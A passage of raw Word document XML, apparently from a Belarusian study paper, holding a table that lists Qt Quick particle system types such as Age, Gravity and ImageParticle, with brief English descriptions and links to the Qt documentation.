          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1472" w:name="_Toc483000848"/>
      <w:bookmarkStart w:id="1473" w:name="_Toc483003841"/>
      <w:bookmarkStart w:id="1474" w:name="_Toc483604194"/>
      <w:bookmarkStart w:id="1475" w:name="_Toc483605414"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Тыпы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1472"/>
      <w:bookmarkEnd w:id="1473"/>
      <w:bookmarkEnd w:id="1474"/>
      <w:bookmarkEnd w:id="1475"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="1162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7938"/>
        <w:gridCol w:w="1985"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B55535" w:rsidRPr="00763692" w:rsidTr="00B55535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>Тып</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>апісанне</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>url</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="002230B8" w:rsidTr="00B55535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Age</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Age affector allows you to alter where the particle is in its lifecycle. Common uses are to expire particles prematurely, possibly giving them time to animate out.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Age affector is also sometimes known as a 'Kill' affector, because with the default parameters it will </w:t>
            </w:r>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>immediately expire all particles which it affects</w:t>
            </w:r>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007945B6">
              <w:rPr>
                <w:i/>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The Age affector only applies to particles which are still alive.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1861" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-particles-age.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="002230B8" w:rsidTr="00B55535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>AngleDirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="001330A1" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001330A1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The AngledDirection element allows both the specification of a direction by angle and magnitude, as well as varying the parameters by angle or magnitude.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="001330A1" w:rsidRDefault="00490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1862" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-particles-angledirection.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="002230B8" w:rsidTr="00B55535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CumulativeDirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001330A1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The CumulativeDirection element will act as a direction that </w:t>
            </w:r>
            <w:r w:rsidRPr="001330A1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>sums the directions within it</w:t>
            </w:r>
            <w:r w:rsidRPr="001330A1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="001330A1" w:rsidRDefault="00490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1863" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-particles-</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="be-BY"/>
                </w:rPr>
                <w:lastRenderedPageBreak/>
                <w:t>cumulativedirection.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="00C16B41" w:rsidTr="00B55535">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="001330A1" w:rsidRDefault="00490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1864" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="001330A1">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                </w:rPr>
                <w:t>CustomParticle</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001330A1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">For </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>specifying shaders</w:t>
            </w:r>
            <w:r w:rsidRPr="001330A1">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to paint particles</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>L</w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">SL </w:t>
            </w:r>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t>код.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1985" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="007945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="2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65" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Direction</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For specifying a vector space</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66" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>EllipseShape</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Represents an ellipse to other particle system elements</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7945B6" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Friction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00B55535" w:rsidRPr="00B55535" w:rsidRDefault="00B55535" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For applying friction proportional to the particle's current velocity</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B55535" w:rsidRPr="007945B6" w:rsidRDefault="00490E7E" w:rsidP="00B55535">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1867" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="0090003B">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-particles-friction.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B55535" w:rsidRPr="002230B8" w:rsidTr="00B55535">
        <w:trPr>
          <w:trHeight w:val="222"/>
        </w:trPr>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68" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Gravity</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For applying acceleration in an angle</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69" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>GroupGoal</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For changing the state of a group of a particle</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70" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ImageParticle</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For visualizing logical particles using an image</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71" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ItemParticle</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For specifying a delegate to paint particles</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72" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>LineShape</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Represents a line for affectors and emitters</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spacing w:after="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1873" w:history="1">
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Mas</w:t>
              </w:r>
              <w:r w:rsidR="00B55535" w:rsidRPr="00B55535">
                <w:rPr>
                  <w:rStyle w:val="20"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="17A81A"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>kShape</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r w:rsidRPr="00B55535">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:color w:val="404244"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>For representing an image as a shape to affectors and emitters</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jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Affector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
